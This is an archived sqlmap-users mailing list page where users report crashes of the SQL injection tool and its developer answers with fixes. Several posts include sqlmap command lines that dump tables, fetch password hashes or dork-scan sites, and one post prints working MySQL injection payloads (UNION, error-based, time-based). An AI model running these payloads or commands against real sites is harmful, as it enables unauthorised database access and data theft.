Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: David G. <sk...@gm...> - 2011-01-28 15:03:17
|
--start and --stop are not working Sqlmap just ignore these parameter. i think when used with union injection technique, these parameters are ignored(??). tried with --start 1 and --stop 20. On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar < mir...@gm...> wrote: > in the mean time you can try to use these: > > --start=LIMITSTART First query output entry to retrieve > --stop=LIMITSTOP Last query output entry to retrieve > > kr > > On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar > <mir...@gm...> wrote: > > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > > > > "A MemoryError exception is a built-in Python exception "Raised when an > > operation runs out of memory but the situation may still be rescued > > (by deleting some objects)." > > > > How many members does this list have? According to the FAQ, the largest > > list reported to date has 147,000 members and presumably works. > > Possibly something in the cPanel implementation or your particular > > installation limits this to a greater degree." > > > > now, this messes our concept a bit but we'll try to adapt. > > > > kr > > > > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > > <mir...@gm...> wrote: > >> LOL (50,350 entries in the table and 48 columns) > >> > >> we'll try to make some tests regarding this and report accordingly. > >> haven't planed this kind of "huge" data retrievals :) > >> > >> kr > >> > >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> > wrote: > >>> # ./sqlmap.py --method post --cookie > "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" > -v 3 > >>> -D nomes -T class --dump > >>> > >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool > >>> http://sqlmap.sourceforge.net > >>> > >>> [*] starting at: 16:58:05 > >>> > >>> [16:58:05] [DEBUG] cleaning up configuration parameters > >>> [16:58:05] [DEBUG] setting the HTTP timeout > >>> [16:58:05] [DEBUG] setting the HTTP Cookie header > >>> [16:58:05] [DEBUG] setting the HTTP method to POST > >>> [16:58:05] [DEBUG] creating HTTP requests opener object > >>> [16:58:05] [INFO] using > >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > >>> [16:58:05] [INFO] resuming injection data from session file > >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > >>> [16:58:05] [INFO] testing connection to the target url > >>> you provided an HTTP Cookie header value. The target url provided its > own > >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using > the > >>> HTTP Cookie values that you provided? [Y/n] > >>> sqlmap identified the following injection points with a total of 0 > HTTP(s) > >>> requests: > >>> --- > >>> Place: POST > >>> Parameter: vulnparam > >>> Type: boolean-based blind > >>> Title: AND boolean-based blind - WHERE or HAVING clause > >>> Payload: vulnparam=6 AND 5647=5647 > >>> > >>> Type: error-based > >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) > THEN 1 > >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > >>> information_schema.tables GROUP BY x)a) > >>> > >>> Type: UNION query > >>> Title: MySQL UNION query (NULL) - 4 to 7 columns > >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS > CHAR), > >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > >>> > >>> Type: AND/OR time-based blind > >>> Title: MySQL > 5.0.11 AND time-based blind > >>> Payload: vulnparam=6 AND SLEEP(5) > >>> --- > >>> > >>> [16:58:06] [INFO] the back-end DBMS is MySQL > >>> > >>> web application technology: PHP 5.3.2 > >>> back-end DBMS: MySQL 5.0 > >>> [16:58:06] [INFO] fetching columns for table 'class' on database > 'nomes' > >>> [16:58:06] [INFO] read from file > >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > >>> [16:58:06] [INFO] fetching entries for table 'class' on database > 'nomes' > >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL > FROM > >>> nomes.class# > >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds > >>> > >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your > run > >>> with the latest development version from the Subversion repository. If > the > >>> exception persists, please send by e-mail to > >>> sql...@li... the command line, the following > text and > >>> any information needed to reproduce the bug. The developers will try to > >>> reproduce the bug, fix it accordingly and get back to you. > >>> sqlmap version: 0.9-dev > >>> Python version: 2.6.5 > >>> Operating system: posix > >>> Traceback (most recent call last): > >>> File "./sqlmap.py", line 83, in main > >>> start() > >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, > in > >>> start > >>> action() > >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in > action > >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line > 1189, in > >>> dumpTable > >>> entries = inject.getValue(query, blind=False, dump=True) > >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in > getValue > >>> value = __goInband(query, expected, sort, resumeValue, unpack, > dump) > >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in > __goInband > >>> data = parseUnionPage(output, expression, partial, None, sort) > >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > >>> parseUnionPage > >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > >>> kb.injection.place, conf.parameters[kb.injection.place], expression, > >>> logOutput)) > >>> MemoryError > >>> > >>> [*] shutting down at: 17:00:13 > >>> > >>> There are about 50,350 entries in the table and 48 columns.I tested the > >>> query manually, and returned a page with 600k of information.I think > that > >>> sqlmap did not support the amount of data...? > >>> > >>> David > >>> > >>> > ------------------------------------------------------------------------------ > >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > >>> Finally, a world-class log management solution at an even better > price-free! > >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires > >>> February 28th, so secure your free ArcSight Logger TODAY! > >>> http://p.sf.net/sfu/arcsight-sfd2d > >>> _______________________________________________ > >>> sqlmap-users mailing list > >>> sql...@li... > >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >>> > >>> > >> > >> > >> > >> -- > >> Miroslav Stampar > >> > >> E-mail / Jabber: miroslav.stampar (at) gmail.com > >> Mobile: +385921010204 (HR 0921010204) > >> PGP Key ID: 0xB5397B1B > >> Location: Zagreb, Croatia > >> > > > > > > > > -- > > Miroslav Stampar > > > > E-mail / Jabber: miroslav.stampar (at) gmail.com > > Mobile: +385921010204 (HR 0921010204) > > PGP Key ID: 0xB5397B1B > > Location: Zagreb, Croatia > > > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- David Gomes Guimarães |
|
From: yonny m. <yo...@go...> - 2011-01-28 14:43:46
|
17:41:07] [INFO] read from file '/pentest/database/sqlmap/output/
192.168.200.203/session':
[17:41:08] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[17:41:30] [INFO] read from file '/pentest/database/sqlmap/output/
192.168.200.203/session':
[17:41:30] [INFO] retrieved:
[17:41:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the command line, the following text and
any information needed to reproduce the bug. The developers will try to
reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r3125)
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
File "./sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in
start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 106, in
action
conf.dbmsHandler.dumpAll()
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1405,
in dumpAll
kb.data.cachedTables = self.getTables()
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 821,
in getTables
for db, table in value:
ValueError: need more than 1 value to unpack
[*] shutting down at: 17:41:37
|
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 14:31:55
|
Hi all. All of you who noticed error like (especially for '--passwords' switch): "ValueError: need more than 1 value to unpack" Bug has been found and fixed :) Enjoy! KR -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 14:31:48
|
fixed kr On Thu, Jan 27, 2011 at 3:04 AM, m4l1c3 <mal...@gm...> wrote: > > ./sqlmap.py -u "http://DOMAIN:80/LANG/DIR/PARAM.php?xxx=999" --passwords > > > > sqlmap version: 0.9-dev (r3115) > Python version: 2.5.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 414, in start > action() > File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 77, in > action > conf.dbmsHandler.getPasswordHashes(), "password hash") > File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line > 238, in getPasswordHashes > for user, password in value: > ValueError: need more than 1 value to unpack > > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 13:38:37
|
hi. this is a "relative" of a bug reported by black zero <tim...@gm...> dated 12/28/10 ([sqlmap-users] UnicodeEncodeError: 'ascii') which was patched at non-optimization level (normal connection module). now, it's being done at the keepalive module too. problem is introduced because of "non-ASCII conformant chars are used in headers" which python's httplib and urllib2 have (KNOWN) problems with. now, those problematic header values/characters are converted to the format described in http://en.wikipedia.org/wiki/Unicode_and_HTML. kr p.s. please update and report if problem(s) persist On Fri, Jan 28, 2011 at 2:01 PM, m4l1c3 <mal...@gm...> wrote: > ./sqlmap.py -g "domain.xx ext:php" --dbs --batch -o > > sqlmap version: 0.9-dev (r3122) > Python version: 2.5.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 254, in start > checkNullConnection() > File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 748, in > checkNullConnection > page, headers = Request.getPage(method=HTTPMETHOD.HEAD) > File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 197, in > getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen > return _opener.open(url, data) > File "/usr/lib/python2.5/urllib2.py", line 381, in open > response = self._open(req, data) > File "/usr/lib/python2.5/urllib2.py", line 399, in _open > '_open', req) > File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain > result = func(*args) > File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line > 208, in http_open > return self.do_open(HTTPConnection, req) > File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line > 179, in do_open > self._start_connection(h, req) > File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line > 138, in _start_connection > h.endheaders() > File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line > 336, in endheaders > self._send_output() > File "/usr/lib/python2.5/httplib.py", line 732, in _send_output > self.send(msg) > File "/usr/lib/python2.5/httplib.py", line 711, in send > self.sock.sendall(str) > File "<string>", line 1, in sendall > UnicodeEncodeError: 'ascii' codec can't encode characters in position 82-87: > ordinal not in range(128) > > > This doesn't look like problem to me, but I thought I'd pass it on if I > missed something. > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: m4l1c3 <mal...@gm...> - 2011-01-28 13:01:08
|
./sqlmap.py -g "domain.xx ext:php" --dbs --batch -o
sqlmap version: 0.9-dev (r3122)
Python version: 2.5.2
Operating system: posix
Traceback (most recent call last):
File "./sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line
254, in start
checkNullConnection()
File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 748, in
checkNullConnection
page, headers = Request.getPage(method=HTTPMETHOD.HEAD)
File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 197, in
getPage
conn = urllib2.urlopen(req)
File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
return _opener.open(url, data)
File "/usr/lib/python2.5/urllib2.py", line 381, in open
response = self._open(req, data)
File "/usr/lib/python2.5/urllib2.py", line 399, in _open
'_open', req)
File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
result = func(*args)
File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line
208, in http_open
return self.do_open(HTTPConnection, req)
File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line
179, in do_open
self._start_connection(h, req)
File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line
138, in _start_connection
h.endheaders()
File "/pentest/database/sqlmap-dev/extra/keepalive/keepalive.py", line
336, in endheaders
self._send_output()
File "/usr/lib/python2.5/httplib.py", line 732, in _send_output
self.send(msg)
File "/usr/lib/python2.5/httplib.py", line 711, in send
self.sock.sendall(str)
File "<string>", line 1, in sendall
UnicodeEncodeError: 'ascii' codec can't encode characters in position 82-87:
ordinal not in range(128)
This doesn't look like problem to me, but I thought I'd pass it on if I
missed something.
|
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 22:13:05
|
Hi. I would suggest you to research "lib\core\testing.py" (liveTest() together with auxiliary methods). It was not updated for quite long time, but it should be useful for starters. It's meant for our internal testing (smoke testing for dummy checking via module loading and live testing against our VMs). KR On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho <and...@gm...> wrote: > Guys, > > What's the best way to create a sqlmap wrapper? > > In the w3af project we have a very old version of sqlmap > integrated as an attack plugin [0]. Right now we're doing something > like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap > version we include is very old, I would like to update it to the > latest trunk version. My objective is to build something that's > extensible and will allow me to update w3af's sqlmap frequently > without any (if possible) effort. In order to do that, I need to write > a decent wrapper that will not depend on the changes in sqlmap's > implementation. > > Ideas? > > Regards, > > [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts) > -- > Andrés Riancho > Director of Web Security at Rapid7 LLC > Founder at Bonsai Information Security > Project Leader at w3af > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Andres R. <and...@gm...> - 2011-01-27 22:05:09
|
Guys,
What's the best way to create a sqlmap wrapper?
In the w3af project we have a very old version of sqlmap
integrated as an attack plugin [0]. Right now we're doing something
like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
version we include is very old, I would like to update it to the
latest trunk version. My objective is to build something that's
extensible and will allow me to update w3af's sqlmap frequently
without any (if possible) effort. In order to do that, I need to write
a decent wrapper that will not depend on the changes in sqlmap's
implementation.
Ideas?
Regards,
[0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)
--
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af
|
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 20:04:19
|
in the mean time you can try to use these: --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve kr On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar <mir...@gm...> wrote: > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > > "A MemoryError exception is a built-in Python exception "Raised when an > operation runs out of memory but the situation may still be rescued > (by deleting some objects)." > > How many members does this list have? According to the FAQ, the largest > list reported to date has 147,000 members and presumably works. > Possibly something in the cPanel implementation or your particular > installation limits this to a greater degree." > > now, this messes our concept a bit but we'll try to adapt. > > kr > > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > <mir...@gm...> wrote: >> LOL (50,350 entries in the table and 48 columns) >> >> we'll try to make some tests regarding this and report accordingly. >> haven't planed this kind of "huge" data retrievals :) >> >> kr >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >>> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >>> -D nomes -T class --dump >>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >>> http://sqlmap.sourceforge.net >>> >>> [*] starting at: 16:58:05 >>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >>> [16:58:05] [DEBUG] setting the HTTP timeout >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >>> [16:58:05] [DEBUG] setting the HTTP method to POST >>> [16:58:05] [DEBUG] creating HTTP requests opener object >>> [16:58:05] [INFO] using >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >>> [16:58:05] [INFO] resuming injection data from session file >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >>> [16:58:05] [INFO] testing connection to the target url >>> you provided an HTTP Cookie header value. The target url provided its own >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >>> HTTP Cookie values that you provided? [Y/n] >>> sqlmap identified the following injection points with a total of 0 HTTP(s) >>> requests: >>> --- >>> Place: POST >>> Parameter: vulnparam >>> Type: boolean-based blind >>> Title: AND boolean-based blind - WHERE or HAVING clause >>> Payload: vulnparam=6 AND 5647=5647 >>> >>> Type: error-based >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >>> information_schema.tables GROUP BY x)a) >>> >>> Type: UNION query >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >>> >>> Type: AND/OR time-based blind >>> Title: MySQL > 5.0.11 AND time-based blind >>> Payload: vulnparam=6 AND SLEEP(5) >>> --- >>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >>> >>> web application technology: PHP 5.3.2 >>> back-end DBMS: MySQL 5.0 >>> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >>> [16:58:06] [INFO] read from file >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >>> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >>> nomes.class# >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>> with the latest development version from the Subversion repository. If the >>> exception persists, please send by e-mail to >>> sql...@li... the command line, the following text and >>> any information needed to reproduce the bug. The developers will try to >>> reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 0.9-dev >>> Python version: 2.6.5 >>> Operating system: posix >>> Traceback (most recent call last): >>> File "./sqlmap.py", line 83, in main >>> start() >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >>> start >>> action() >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >>> dumpTable >>> entries = inject.getValue(query, blind=False, dump=True) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >>> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >>> data = parseUnionPage(output, expression, partial, None, sort) >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >>> parseUnionPage >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >>> logOutput)) >>> MemoryError >>> >>> [*] shutting down at: 17:00:13 >>> >>> There are about 50,350 entries in the table and 48 columns.I tested the >>> query manually, and returned a page with 600k of information.I think that >>> sqlmap did not support the amount of data...? >>> >>> David >>> >>> ------------------------------------------------------------------------------ >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>> Finally, a world-class log management solution at an even better price-free! >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>> February 28th, so secure your free ArcSight Logger TODAY! >>> http://p.sf.net/sfu/arcsight-sfd2d >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30
|
http://mail.python.org/pipermail/mailman-users/2005-October/047436.html "A MemoryError exception is a built-in Python exception "Raised when an operation runs out of memory but the situation may still be rescued (by deleting some objects)." How many members does this list have? According to the FAQ, the largest list reported to date has 147,000 members and presumably works. Possibly something in the cPanel implementation or your particular installation limits this to a greater degree." now, this messes our concept a bit but we'll try to adapt. kr On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar <mir...@gm...> wrote: > LOL (50,350 entries in the table and 48 columns) > > we'll try to make some tests regarding this and report accordingly. > haven't planed this kind of "huge" data retrievals :) > > kr > > On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >> -D nomes -T class --dump >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 16:58:05 >> >> [16:58:05] [DEBUG] cleaning up configuration parameters >> [16:58:05] [DEBUG] setting the HTTP timeout >> [16:58:05] [DEBUG] setting the HTTP Cookie header >> [16:58:05] [DEBUG] setting the HTTP method to POST >> [16:58:05] [DEBUG] creating HTTP requests opener object >> [16:58:05] [INFO] using >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> [16:58:05] [INFO] resuming injection data from session file >> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> [16:58:05] [INFO] testing connection to the target url >> you provided an HTTP Cookie header value. The target url provided its own >> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >> HTTP Cookie values that you provided? [Y/n] >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: POST >> Parameter: vulnparam >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: vulnparam=6 AND 5647=5647 >> >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> information_schema.tables GROUP BY x)a) >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 4 to 7 columns >> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: vulnparam=6 AND SLEEP(5) >> --- >> >> [16:58:06] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.3.2 >> back-end DBMS: MySQL 5.0 >> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >> [16:58:06] [INFO] read from file >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >> nomes.class# >> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >> with the latest development version from the Subversion repository. If the >> exception persists, please send by e-mail to >> sql...@li... the command line, the following text and >> any information needed to reproduce the bug. The developers will try to >> reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: posix >> Traceback (most recent call last): >> File "./sqlmap.py", line 83, in main >> start() >> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >> start >> action() >> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >> dumpTable >> entries = inject.getValue(query, blind=False, dump=True) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >> data = parseUnionPage(output, expression, partial, None, sort) >> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> parseUnionPage >> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> kb.injection.place, conf.parameters[kb.injection.place], expression, >> logOutput)) >> MemoryError >> >> [*] shutting down at: 17:00:13 >> >> There are about 50,350 entries in the table and 48 columns.I tested the >> query manually, and returned a page with 600k of information.I think that >> sqlmap did not support the amount of data...? >> >> David >> >> ------------------------------------------------------------------------------ >> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> Finally, a world-class log management solution at an even better price-free! >> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> February 28th, so secure your free ArcSight Logger TODAY! >> http://p.sf.net/sfu/arcsight-sfd2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:48:48
|
